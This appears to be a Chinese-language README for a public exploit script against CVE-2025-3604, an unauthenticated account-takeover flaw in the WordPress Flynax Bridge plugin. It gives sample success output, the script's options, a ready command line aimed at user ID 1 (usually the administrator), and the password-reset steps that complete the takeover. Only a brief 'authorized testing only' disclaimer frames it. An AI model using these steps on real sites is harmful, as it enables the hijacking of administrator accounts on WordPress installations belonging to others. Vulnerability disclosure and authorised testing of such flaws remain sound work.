用于 WordPress 的 Flynax Bridge 插件在所有版本(包括 2.2.0)中均存在 通过账户劫持实现权限提升 的漏洞。
该漏洞是由于插件在更新用户账户详情(如邮箱)之前,未能正确验证用户身份。因此,未认证的攻击者 可以更改 任意用户(包括 管理员)的电子邮件地址,然后发起 密码重置 以完全接管该账户。
CVE: CVE-2025-3604
CVSS: 9.8 (严重)
发布时间: 2025年4月23日
最后更新: 2025年4月24日
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: [email protected]
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited
成功利用后,攻击者可前往 WordPress 登录页面,使用 新设置的邮箱 点击 “丢失密码?” 来重置密码,从而获得目标账户的完全访问权限。
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID
WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)
options:
-h, --help 显示此帮助信息并退出
-u, --url URL 目标 URL
-mail, --newmail NEWMAIL
要设置的新邮箱
-id, --user_id USER_ID 要利用的用户 ID
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "[email protected]"
-u: WordPress 站点的基础 URL。-id: 要攻击的用户 ID(通常为 1,即管理员)。-mail: 为该用户设置的新邮箱。仅供授权测试和教育目的使用,风险自负。
作者:Nxploited ( Khaled_alenazi )